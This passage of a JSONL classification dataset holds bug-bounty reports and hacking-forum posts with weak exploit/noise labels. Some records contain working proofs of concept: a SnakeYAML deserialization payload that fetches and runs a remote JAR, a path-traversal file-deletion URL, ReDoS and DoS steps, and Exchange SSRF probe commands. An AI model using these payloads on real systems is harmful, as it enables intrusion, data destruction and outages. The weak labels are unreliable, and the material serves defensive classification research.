exfiltrate data or install malware on the user's machine. Attackers can masquerade as authorized users via session cookies, allowing them to perform any action allowed by the user account.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-24", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3946be1a00ce6a23a7d7", "text": "Can you show the syntax that you usted to get the flag? To know what and why you’re stuck. If you’re doing something wrong. For the last, do you upload the right payload in the “404.php” on theme editor? Feel free to DM me.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-01-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9df55ae4cbd0866c7181", "text": "[Uncontrolled Resource Consumption] DoS via large console messages\n\n## Summary:\nWhen server console logging is enabled, it's possible to cause a complete denial of service to the server by submitting large text (>64KB) that gets output in the console log. This causes the server to become unavailable for all users.\n\n## Steps To Reproduce:\n_I set up my environment following the steps at https://developers.mattermost.com/contribute/server/developer-setup/windows-wsl/_\n\n 1. Create a test server and team.\n2. Make sure console logging is enabled in the server settings, with debug level.\n 3. Visit the server via Burp Suite for the next step.\n 4. Go to a channel, and type some non-existing slash command like`/command` that doesn't exist, and execute it while intercepting the request in Burp Suite.\n5. You should get a POST request to `/api/v4/commands/execute` with a JSON body with a `command` value.\n6. Send the request to the Repeater in Burp Suite.\n7. _The vulnerability comes from the fact that if you type a non-existent command, it will log an error that includes the command you gave. There is no size limit on the command value in the API directly (only in the text box)._\n8. Replace the command value with `/000000000000000000000000000000000000000000000000000000000000000...`, where you use more than ~64KB of text (66,000+ characters will do nicely). _You can copy and paste, select all, and copy-paste repeatedly to generate a large text size._\n9. If you send the request with this super large payload, the server will see the command is invalid, and try to log the error message to the console. The error message contains the large payload, and **will cause the server to become unresponsive if the log message is over ~64KB** (65,535 bytes) (The size includes the rest of the error message, so the exact payload size required will be a bit less, but 66,000 bytes ensures it will always work without adding too many unnecessary characters).\n10. The server will not connect now until you restart with the `make run-server` command, and will be unavailable for all users and all teams.\n\nThis only works when CONSOLE logging is enabled (file logging doesn't seem to be affected). And for this attack vector, it is required to have DEBUG logging enabled, but it might be possible to find a vector that works via a different log type.\n\nI will say I also found another vector abusing this same issue via SQL query logging, which I will submit later depending on the status of this report. But obviously, since it requires SQL query logging to be enabled it's not as big of an issue as this one, and it has the same root cause.\n\n## Impact\n\nComplete Denial of Service to all users of a server. It would be trivial to execute a script that automatically sends the payload whenever the server is available, to make sure it continually crashes.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1a2b85256945d7d19b66", "text": "[Business Logic Errors] CVE-2022-27782: TLS and SSH connection too eager reuse\n\n## Summary:\nCurl fails to consider some security related options when reusing TLS connections. For example:\n- CURLOPT_SSL_OPTIONS\n- CURLOPT_PROXY_SSL_OPTIONS\n- CURLOPT_CRLFILE\n- CURLOPT_PROXY_CRLFILE\n\nAs a result for example TLS connection with lower security (`CURLSSLOPT_ALLOW_BEAST`,` CURLSSLOPT_NO_REVOKE`) connection reused when it should no longer be. Also connection that has been authenticated perviously with `CURLSSLOPT_AUTO_CLIENT_CERT` might be reused for connections that should not be.\n\n## Steps To Reproduce:\n1. `(echo -ne \"HTTP/1.1 200 OK\\r\\nContent-Length: 6\\r\\n\\r\\nHello\\n\"; sleep 5; echo -ne \"HTTP/1.1 200 OK\\r\\nContent-Length: 6\\r\\n\\r\\nAgain\\n\") | openssl s_server -cert cert.pem -key privkey.pem -cert_chain chain.pem -accept 9443`\n2. `curl -v --ssl-no-revoke --ssl-allow-beast https://targethost.tld:9443 -: https://targethost.tld:9443`\n\nConnections are made using the same reused connection even though security settings change.\n\nWith curl built against openssl:\n1. `curl http://cdp.geotrust.com/GeoTrustRSACA2018.crl | openssl crl -out testcrl.pem`\n2. `curl -v https://curl.se -: --crlfile crlfile.pem https://curl.se`\n\nThe crlfile.pem use should result in `curl: (60) SSL certificate problem: unable to get certificate CRL` but is ignored since previous connection is reused.\n\nWith curl built against Schannel and revoked certificate:\n1. `curl -v --ssl-no-revoke https://revoked.grc.com -: https://revoked.grc.com`\n\nSecond connection will reuse the existing connection even though revocation check is no longer requested.\n\n## Note:\n\nThere may be more options that might have the similar issues. These were the most obvious I could see (ones having obvious security impact).\n\n## Impact\n\nWrong identity (client certificate) or TLS security options being used for subsequent connections to the same hosts.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2022-27782"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1f0fdde00633c9bd0ccf", "text": "[Code Injection] Ingress-nginx annotation injection allows retrieval of ingress-nginx serviceaccount token and secrets across all namespaces\n\nI submitted the following report to security@kubernetes.io:\n> I've been exploring CVE-2021-25742 and believe I've discovered a variant (although it appears there may be many). Most template variables are not escaped properly in `nginx.tmpl`, leading to injection of arbitrary nginx directives. For example, the `nginx.ingress.kubernetes.io/connection-proxy-header` annotation is not validated/escaped and is inserted directly into the `nginx.conf` file.\n>\n> An attacker in a multi-tenant cluster with permission to create/modify ingresses can inject content into the connection-proxy-header annotation and read arbitrary files from the ingress controller (including the service account).\n>\n> I've created a secret gist demonstrating the issue against ingress-nginx v1.0.4: https://gist.github.com/amlweems/1cb7e96dca8ada8aee8dc019d4163f2c\n\n## Impact\n\nAn attacker with permission to create/modify ingresses in one namespace can inject content into the connection-proxy-header annotation and read arbitrary files from the ingress controller (including the service account). This service account has permission to read secrets in all namespaces.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2021-25742"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-08-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1c98e34a1c3cb5242628", "text": "There are only two chipsets that serious cybersecurity specialists do recommend, the Atheros AR9271 and the Realtek RTL8812AU. For more information related to these chipsets, you may find David Bombal’s YT videos useful. Or you know, google it. If you want to do packet injection and monitor nearby networks you gotta have an adapter that has these capabilities. There are more out there, other chipsets but I honestly believe these are the best money can buy, Both chipsets can be found in the ALFA adapters which everyone agrees are the best. Which specific adapter, there are a few, depends on your budget, how easy are to conceal and of course, availability, not everyone lives in a country where ALFA products will be easy to find. A more affordable option is the TP-Link WN722N version 1, it comes with the Atheros chipset and I think works out of the box, aka plug and play, but today’s market has only version 2 or 3 available which cant do monitor mode and packet injection without drivers and help. If you find a version 1 adapter you are a lucky man, if not Bombal’s videos help you to install the drivers, and voila, within minutes your TP-Link will work but bear in mind the chipset isn’t the Atheros or the Realtek 8812au, rather another version, can’t remember which one now. It will work but in terms of performance and quality is considered inferior quality. I talked about brands but more important than the brand is the chipset which, if you are lucky, you can find in unbranded generic adapters like the Wifi Nation and others. Mine is an unbranded one with the RTL8812AU chipset. If you find a cheaper unbranded adapter that comes in cheap miserable packaging but the chipset is one of the two, then go get it. Keep in mind that Atheros is single-band only, 2.4 while the RTL is dual, 2.4 and 5.8 I hope you find this information useful.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2022-04-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "aed5ab7816f6545c9cd4", "text": "[Uncontrolled Resource Consumption] Slowvote and Countdown can cause Denial of Service due to recursive inclusion\n\nSimilar to #85011, if you edit a Slowvote or Countdown object and include its own object ID in the description, then it will recursively include and prevent the page from loading.\n\nmongoose\n\n## Impact\n\nDenial of Service. You can include the Slowvote or Countdown object on any other object to also prevent it from loading. If it is included in the feed, you could also prevent the home page from loading.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "17db066d491e556b9ff6", "text": "[Information Disclosure] Limited path traversal in Node.js SDK leads to PII disclosure\n\n## Summary:\nIt is possible to use `.` and `..` as identifier in all API methods, which leads to calling the parent api method.\nNext, I will describe the problem using checkout sessions as an example, because it is the most basic one. However, other methods are also vulnerable to this problem.\nFor example, using `.` as checkout session id in [Retrieve a Session](https://stripe.com/docs/api/checkout/sessions/retrieve) method leads to call [List all Checkout Sessions](https://stripe.com/docs/api/checkout/sessions/list) method.\nThe problem arises because the Node.js http implementation automatically normalizes the path, so request `https://api.stripe.com/v1/checkout/sessions/.` will normalize to `https://api.stripe.com/v1/checkout/sessions/`.\nI checked other SDKs and it looks like the problem is only in the Node.js SDK.\n\n## Steps To Reproduce:\nFor ease of reproduction, let's create a project using [accept-a-payment](https://github.com/stripe-samples/accept-a-payment) sample template.\n\n 1. Register Stripe account and obtain `STRIPE_SECRET_KEY`\n 1. Create sample project using Stripe docker cli: `docker run --rm -it -v $(pwd):/samples -w /samples stripe/stripe-cli:latest samples create accept-a-payment`\n 1. Choose `prebuilt-checkout-page` integration, `html` client and `node` server.\n 1. Create `.env` file in `accept-a-payment/server` directory with contents:\n ```\n STRIPE_SECRET_KEY=xxx\n STATIC_DIR=/app/client\n DOMAIN=http://localhost:4242\n ```\n 1. Run another docker container with nodejs: `run -it --rm -v $(pwd)/accept-a-payment:/app -w /app/server -p 4242:4242 node bash`\n 1. Install dependencies: `npm install`\n 1. Start the server: `node server.js`\n 1. Open web page in browser and complete the payment: `http://localhost:4242`\n 1. Send curl request in terminal: `curl \"http://localhost:4242/checkout-session?sessionId=.\" | jq` (this request does not require any authentication and returns PII of all successful payments).\n\nExample output:\n```json\n{ \n \"object\": \"list\", \n \"data\": [ \n { \n \"id\": \"cs_test_a14L46PUF4tbXhcFrVU4Zv42kBQD2Hw5TIR6XdNHPJFckllG1Un4MztwlF\", \n \"object\": \"checkout.session\", \n \"after_expiration\": null, \n \"allow_promotion_codes\": null, \n \"amount_subtotal\": 500, \n \"amount_total\": 500, ", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-10-10", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a8263218fab4cb059e55", "text": "Well it appears I over complicated this by 1000 times. At least I learned how to process data and modify scripts lol.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-07-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ec27b4c78cfd2e6b8824", "text": "[Open Redirect] open redirect to a remote website which can phish users\n\nBy Adding some extra headers in the request I noticed that the user is redirected to a remote website. This can lead to stealing a user credentials (phishing) on a remote server.\n\nThese headers can be added either using a MITM attack or by chaining with another vulnerability such as request smuggling, header injection more commonly abusing a reverse proxy that sits in front of the website.\n\nps:crayons\n\n## Impact\n\nThis can lead to stealing a user credentials (phishing) on a remote server or planting malware on the user's computer.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-11-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e06686c478d4b47094ec", "text": "[Unknown] ReDoS in Time.rfc2822\n\nHello, I found a pattern that occur ReDoS in `Time.rfc2822` (and `Time.rfc822`).\n\nhttps://github.com/ruby/time/blob/v0.2.0/lib/time.rb#L505\n\n```ruby\n def rfc2822(date)\n if /\\A\\s*\n (?:(?:Mon|Tue|Wed|Thu|Fri|Sat|Sun)\\s*,\\s*)?\n (\\d{1,2})\\s+\n (Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)\\s+\n (\\d{2,})\\s+\n (\\d{2})\\s*\n :\\s*(\\d{2})\\s*\n (?::\\s*(\\d{2}))?\\s+\n ([+-]\\d{4}|\n UT|GMT|EST|EDT|CST|CDT|MST|MDT|PST|PDT|[A-IK-Z])/ix =~ date\n``` \n\nIt is a detect result by `recheck` ( https://makenowjust-labs.github.io/recheck/ ).\n\n{F1624605}\n\n## PoC\n\n```\n❯ ruby -v\nruby 3.1.1p18 (2022-02-18 revision 53f5fc4236) [arm64-darwin20]\n\n❯ irb\nirb(main):001:0> require 'time'\n=> true\nirb(main):002:0> Time.rfc2822 \"0 Feb 00 00 :00\" + \" \" * 20000\n# => ReDoS (and raise ArgumentError)\n```\n\n## benchmark\n\nrfc2822_benchmark.rb\n\n```ruby\nrequire 'benchmark'\nrequire 'time'\n \ndef rfc2822_parse(length)\n text = \"0 Feb 00 00 :00\" + \" \" * length\n Time.rfc2822(text)\nrescue ArgumentError\n nil\nend\n\nBenchmark.bm do |x|\n x.report { rfc2822_parse(100) }\n x.report { rfc2822_parse(1000) }\n x.report { rfc2822_parse(10000) }\n x.report { rfc2822_parse(100000) }\nend\n```\n\n```\n❯ bundle exec ruby rfc2822_benchmark.rb\n user system total real\n 0.000326 0.000009 0.000335 ( 0.000344)\n 0.029284 0.000054 0.029338 ( 0.029469)\n 2.860528 0.007354 2.867882 ( 2.875771)\n 290.843621 0.889107 291.732728 (292.665729)\n```\n\n---\n\n\n## Rack\n\nIn `Rack::ConditionalGet`, the header value is parsed by `Time.rfc2822`, so it is possible to attack from the request.\n\nhttps://github.com/rack/rack/blob/2.2.3/lib/rack/conditional_get.rb#L52\n\n### PoC\n\nGemfile\n\n```\n# frozen_string_literal: true\n\nsource \"https://rubygems.org\"\n\ngem 'rack', '~> 2.2', '>= 2.2.3'\ngem 'puma', '~> 5.6', '>= 5.6.2'\n```\n\nconfig.ru\n\n```ruby\nclass Server\n def call(env)\n # puts env\n [ 200, {}, [\"...\"]]\n end\nend\n\nuse ::Rack::ConditionalGet\nrun Server.new\n```\n\n```ruby\nrequire 'net/http'\n\nurl = URI.parse('http://127.0.0.1:9292/')\n\nreq = Net::HTTP::Get.new(url.path)\n\nreq['IF_MODIFIED_SINCE'] = \"0 Feb 00 00 :00\" + \" \" * 20000 + \"+0\"\n\nres = Net::HTTP.start(url.host, url.port) {|http|\n http.request(req)\n}\nputs res.body\n```\n\n```\n❯ time bundle exec ruby rfc2822_request.rb\n...\nbundle exec ruby rfc2822_request.rb 0.18s user 0.07s system 2% cpu 11.516 total\n```\n\n## Impact\n\nReDoS occurs when `Time.rfc2822` accepts user input.\n\nRails uses `::Rack::ConditionalGet` by default, so it can be attacked by a request from the client.\n\nIf using nginx etc., the header length is limited to about 8k bytes, so it seems to be less affected. ( https://stackoverflow.com/questions/686217/maximum-on-http-header-values )\n\nOn the other hand, puma is susceptible because it can be used up to 80 * 1024.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b59426a148bf6f0a08b6", "text": "[Unknown] Unrestricted Access to Celery Flower Instance\n\nHi Team,\n\nThe Celery Flower instance is running and publicly accessible via the PIM mobile route /pim/flower/*. The access to this service is presently unrestricted. \n\nI quickly took a glance at the API to ensure that access is unrestricted. From this quick look, it appears possible to shut down a worker instance, revoke or terminate tasks, and perform other actions. In addition to unrestricted access to tasks and workers, I observed ███ via `/api/tasks` endpoint. Most importantly, the endpoint `/api/task/async-apply/*` seems to apply a task asynchronously, and there seems to be a possibility to execute arbitrary code on the Celery worker through this endpoint. I believe it's unwise for me to go beyond this since the instance is running in the prod environment, so I'm sending this quick report to you. If some form of escalation is needed for impact assessment, please let me know.\n\n##Vulnerable Endpoint\n```\nhttps://api.excalls.mobi/pim/flower/\n```\n\n#Steps to Reproduce\n\n```\nhttps://api.excalls.mobi/pim/flower/api/workers\nhttps://api.excalls.mobi/pim/flower/api/tasks\nhttps://api.excalls.mobi/pim/flower/api/task/info/dc58fcb7-be31-4f4e-aeff-5837f0c32d30\n```\n\n\n\n#Proof of Concept\n█████\n\n████\n\n██████\n\n\n#Suggested Mitigation\n\nSet the `flower_unauthenticated_api` environment variable to `false`\n\n## Impact\n\nThe impact includes, but is not limited to:\n\n1. Manipulating tasks to achieve unintended outcomes, such as disrupting or halting PIM processes.\n2. ███\n3. A malicious actor could continuously monitor and revoke tasks as they are created, preventing their execution and consuming resources. This could exhaust the Celery worker's resources and hinder its ability to handle legitimate tasks.\n4. There seems to be a possibility to execute arbitrary code on the Celery worker by executing a task asynchronously.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-12-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "87a21e022439555bfe65", "text": "[Improper Access Control - Generic] Delete external storage of any user\n\nA security vulnerability was uncovered that allowed standard users to remove external storage resources from any user account in the application. This flaw was particularly concerning because it enabled unauthorized users to delete these resources based on a system-generated ID, which automatically incremented, without requiring any special privileges. This issue didn't grant access to the data but allowed for the indiscriminate removal of external storage associated with user accounts, potentially leading to data loss and disruption of service for affected users.\n\nReproduction Steps:\n1.Begin by logging in with a standard user account and establish an external storage connection.\n2. Afterward, update the storage configuration. Observe that the following request is generated:\n```\nPUT /apps/files_external/userstorages/ HTTP/1.1\nHost: 127.0.0.1:9090\n[REDACTED]\n\n{\"mountPoint\":\"simpleuser\",\"backend\":\"owncloud\",\"authMechanism\":\"password::logincredentials\",\"backendOptions\":{\"host\":\"cq6xxrdnw1941wu9jk4gcyfuglmfa4.oastify.com\",\"root\":\"\",\"secure\":true},\"testOnly\":true,\"id\":,\"mountOptions\":{\"enable_sharing\":true,\"encoding_compatibility\":false,\"encrypt\":true,\"filesystem_check_changes\":1,\"previews\":true,\"readonly\":false}}\n```\n3.Next, log in to the application with an administrative user account or any other role and establish a storage connection.\n4.Observe that each new storage created increments the ID automatically. For instance, it could become 28.\n5. Using the standard user role, issue the request once more to modify the ID linked to the administrative storage. Observe that this action leads to the removal of the storage from the administrator's account.\n\nVIDEO POC:\n{F2778950}\n\n## Impact\n\nThis finding has a huge impact on the application, including data loss, service disruption, unauthorized actions, data privacy concerns, security risks, and potential reputation damage.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-11-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "cc04de8ddfb0c26f728d", "text": "[Cross-site Scripting (XSS) - Reflected] RXSS at image.hackerone.live via the `url` parameter\n\ngood day\n\nhttps://image.hackerone.live:8443/;/;/resource/md/get/url?url=http://oast.pro\n\n\nis allowing full read ssrf wirh permission can try for aws creds.\n\n-Eric\n\n## Impact\n\nfull read ssrf", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-08-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "034d933e1e04f35ca1ef", "text": "[Path Traversal] Arbitrary File Deletion via Path Traversal in image-edit.php\n\n## Summary:\nThe vulnerability is located in the `/libraries/image-editor/image-edit.php` script:\n\n```\n161.\t\tif (@copy ( ICMS_IMANAGER_FOLDER_PATH . '/temp/' . $simage_temp, $categ_path . $simage->getVar ( 'image_name' ) )) {\n162.\t\t\tif (@unlink ( ICMS_IMANAGER_FOLDER_PATH . '/temp/' . $simage_temp )) {\n163.\t\t\t\t$msg = _MD_AM_DBUPDATED;\n\n[...]\n\n190.\t\t} else {\n191.\t\t\tif (copy ( ICMS_IMANAGER_FOLDER_PATH . '/temp/' . $simage_temp, $categ_path . $imgname )) {\n192.\t\t\t\t@unlink ( ICMS_IMANAGER_FOLDER_PATH . '/temp/' . $simage_temp );\n193.\t\t\t}\n```\n\nUser input passed through the \"image_temp\" parameter is not properly sanitized before being used in a call to the `unlink()` function at lines 162 and 192. This can be exploited to carry out Path Traversal attacks and delete arbitrary files in the context of the web server process.\n\n**NOTE**: before being deleted, the file will be copied into the `/uploads/imagemanager/logos/` directory. As such, by firstly deleting the `index.html` file in that directory, it might be possible to disclose the content of arbitrary files in case the web server allows for directory listing.\n\n## ImpressCMS branch :\nThe vulnerability has been tested and confirmed on ImpressCMS version 1.4.2 (the latest at the time of writing).\n\n## Steps To Reproduce:\n 1. Login into the application as any user (this should work both for Webmasters and Registered Users) \n 1. Go to: `http://[impresscms]/libraries/image-editor/image-edit.php?op=save&image_id=1&image_temp=../../../mainfile.php`\n 1. The `mainfile.php` script will be deleted, rendering the website unusable\n\n## Impact\n\nThis vulnerability might allow authenticated attackers to delete arbitrary files, potentially leading to a Denial of Service (DoS) condition or destruction of users data.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "41854d39c222f012c673", "text": "[Unknown] Unauthorized Access - downgraded admin roles to none can still edit projects through brupsuite\n\nhi team,\nI found that your site is vulnerable to Unauthorized Access lead to privilege escalation, where when the owner invites a user with admin roles, the user can still edit anything with admin access, via brupsuite, it should get an error message because the admin role has been removed.\n\n\nproduction step:\n1. The `owner `invites `user` with admin roles at https://dashboard.omise.co/team\n2. Then the `user`, intercept any request using brupsuite, for example edit/add link at https://dashboard.omise.co/v2/links\n3. then the `owner` lowers the role to `none`\n4. then you will see, the user does not see the create link feature because the role is lost\n5. but when the `user` repeats the request step#2 via brupstuite. then it will be valid.\n\nPoC :\n██████\n\n## Impact\n\nUnauthorized Access lead to privilege escalation, downgraded admin roles to none can still edit projects through brupsuite", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7238ca993601dec22b22", "text": "[Use of Hard-coded Credentials] Exposed valid AWS, Mysql, Sendgrid and other secrets\n\n## Summary:\nHi team,\n\nI just discovered some hardcoded credentials allowing access to AWS, Mysql database, ...\n\nTo make this report short, here is the POC: \nsee ███ & █████\n## Steps To Reproduce:\n\nwhere there are the info : \n\n

\nAPP_NAME=Glovo\nAPP_ENV=local\nAPP_KEY=█████\nAPP_DEBUG=false\nAPP_URL=http://localhost\nLOG_CHANNEL=stack\nLOG_LEVEL=debug\nDB_CONNECTION=mysql\nDB_HOST=██████████\nDB_PORT=3306\nDB_DATABASE=████████\nDB_USERNAME=█████\nDB_PASSWORD=█████████\nBROADCAST_DRIVER=log\nCACHE_DRIVER=file\nQUEUE_CONNECTION=sync\nSESSION_DRIVER=file\nSESSION_LIFETIME=120\nMEMCACHED_HOST=127.0.0.1\nREDIS_HOST=█████\nREDIS_PASSWORD=██████████\nREDIS_PORT=11773\nMAIL_MAILER=smtp\nMAIL_HOST=mailhog\nMAIL_PORT=1025\nMAIL_USERNAME=null\nMAIL_PASSWORD=null\nMAIL_ENCRYPTION=null\nMAIL_FROM_ADDRESS=null\nMAIL_FROM_NAME=\"${APP_NAME}\"\nAWS_ACCESS_KEY_ID=███\nAWS_SECRET_ACCESS_KEY=███████\nAWS_DEFAULT_REGION=eu-central-1\nAWS_BUCKET=glovos3\nPUSHER_APP_ID=\nPUSHER_APP_KEY=\nPUSHER_APP_SECRET=\nPUSHER_APP_CLUSTER=mt1\nMIX_PUSHER_APP_KEY=\"${PUSHER_APP_KEY}\"\nMIX_PUSHER_APP_CLUSTER=\"${PUSHER_APP_CLUSTER}\"\nSENDGRID_API_KEY=████\nMAIL_FROM=glovo@appsmart.ro\nMAIL_REPLY_TO=glovo@appsmart.ro\nREDIS_URL=█████\nLINK_RECEIPT=https://glovo.onlineservice.io/g/c/\nSENDGRID_TEMPLATE=d-6ae3f2fe536c41fda21ad60a18c10cce\nSENDGRID_PUBLIC_KEY=███████\n

\n\n\n\n\n 1. The leak was found using Leakix : https://leakix.net/host/16.170.179.191\n\n#Mitigation :\n\nRemove the exposed credentials and revoke them.\n\nRegards,\n\nNB: After checking some files which i deleted immediatly, I found the company name is GLOVOAPPRO SRL and im not sure if it is related to Glovo company, but I can confirm a little bit from the database where I could see delivery fees ... which is about Glovo's principal service (delivery).\n\n## Impact\n\nAnyone could access", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-08", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e847354cd2dc4adee27d", "text": "[Code Injection] The `io.kubernetes.client.util.generic.dynamic.Dynamics` contains a code execution vulnerability due to SnakeYAML\n\n## Summary:\n\nIf the `io.kubernetes.client.util.generic.dynamic.Dynamics` is used to deserialize a `DynamicKubernetesObject `from untrusted YAML, an attacker can achieve code execution inside of the JVM.\n\nSince this is a part of the public API, down stream consumers can be using this API in a way that leaves them vulnerable. I have found no users of this class on GitHub outside of this project's unit tests. But that doesn't mean there are no users of this API. Someone built it for a reason, right?\n\n## Component Version:\n\nKubernettes Java Client version 17.0.0\n\n## Steps To Reproduce:\n\n1. Host a server with a JAR file containing the following code: \n```java\npackage org.jlleitschuh.sandbox;\n\nimport javax.script.ScriptEngine;\nimport javax.script.ScriptEngineFactory;\nimport java.io.IOException;\nimport java.util.List;\n\npublic class ScriptEngineFactoryRCE implements ScriptEngineFactory {\n static {\n try {\n Runtime r = Runtime.getRuntime();\n Process p = r.exec(\"open -a Calculator\");\n p.waitFor();\n } catch (IOException | InterruptedException e) {\n throw new RuntimeException(e);\n }\n }\n\n @Override\n public String getEngineName() {\n return null;\n }\n\n @Override\n public String getEngineVersion() {\n return null;\n }\n\n @Override\n public List getExtensions() {\n return null;\n }\n\n @Override\n public List getMimeTypes() {\n return null;\n }\n\n @Override\n public List getNames() {\n return null;\n }\n\n @Override\n public String getLanguageName() {\n return null;\n }\n\n @Override\n public String getLanguageVersion() {\n return null;\n }\n\n @Override\n public Object getParameter(String key) {\n return null;\n }\n\n @Override\n public String getMethodCallSyntax(String obj, String m, String... args) {\n return null;\n }\n\n @Override\n public String getOutputStatement(String toDisplay) {\n return null;\n }\n\n @Override\n public String getProgram(String... statements) {\n return null;\n }\n\n @Override\n public ScriptEngine getScriptEngine() {\n return null;\n }\n}\n```\n\nThe jar file must contain a file `/META-INF/services/javax.script.ScriptEngineFactory` with the contents `org.jlleitschuh.sandbox.ScriptEngineFactoryRCE # Our RCE Payload`\n\nHost this jar file from a local server's root path.\n\nThen call the `Dynamics` yaml parsing APIs with the following payload:\n\n```yaml\n!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://localhost:8080/\"]]]]\n```\n\n## Fix\n\nThe SnakeYAML parser should be instantiated with the argument `new SafeConstructor()` in order to not be vulnerable to arbitrary deserialization.\n\n## Supporting Material/References:\n - https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in (I'm currently attempting to convince the maintainer of SnakeYaml to make this library secure by default, with limited sucsess)\n - https://nvd.nist.gov/vuln/detail/CVE-2022-1471\n - https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2\n\n## Impact\n\nIf this Dynamics class is used to parse untrusted YAML, an attacker can achieve remote code execution", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-1471"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ddce8a31990f20b2fca3", "text": "Sounds like it will work! The only thing I can think of is things that use your GFX-card for processingpower and that a smaller specced laptop may struggle with those parts. However, it should work to crack hashes etc also but just not as fast as something with a OMGROFLCOPTER Nvidia card", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2022-09-02", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "cc2cd92b67b9db81972f", "text": "Same thing happening to me, and it says to relaunch checkra1n but anytime I try… same text “waiting for dfu device”", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hacker_exploits", "forum_id": "zerosec", "timestamp": "2022-05-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "6d60e698cbbea9ca26c5", "text": "[Business Logic Errors] Subdomain takeover of images.crossinstall.com\n\n## Summary\nimages.crossinstall.com points to an AWS S3 bucket that no longer exists. I was able to take control of this bucket and put my own content onto it. I can now serve content on this domain, obtain a TLS certificate for this domain, etc.\n\nIf any customers or servers are pointing to anything within this domain, I could serve them arbitrary/malicious content. I could also use this in case your domain whitelists your own domain for OAuth, or if there are cookies scoped to the entire domain. Usually this can have a high impact.\n\n## PoC\nVisit images.crossinstall.com/index.html; an HTML comment with my username is present.\n\n```\n% dig images.crossinstall.com +short\nassets.crossinstall.com.s3.amazonaws.com.\ns3-1-w.amazonaws.com.\ns3-w.us-east-1.amazonaws.com.\n52.217.103.180\n\n% curl images.crossinstall.com/index.html\n\n\n% whois crossinstall.com | grep Org\nRegistrant Organization: Twitter, Inc.\nAdmin Organization: Twitter, Inc.\nTech Organization: Twitter, Inc.\n```\n\n## Impact\n\nSubdomain takeover", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-05", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "02c5e9e7a8855cd59cd2", "text": "[Server-Side Request Forgery (SSRF)] mail.acronis.com is vulnerable to zero day vulnerability CVE-2022-41040\n\nHello Acronis team,\n\nPlease run\n\ncurl -ksL -m5 -o /dev/null -I -w \"%{http_code}\" \"https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/autodiscover.json@outlook.com&Protocol=ActiveSync\"\ncurl -ksL -m5 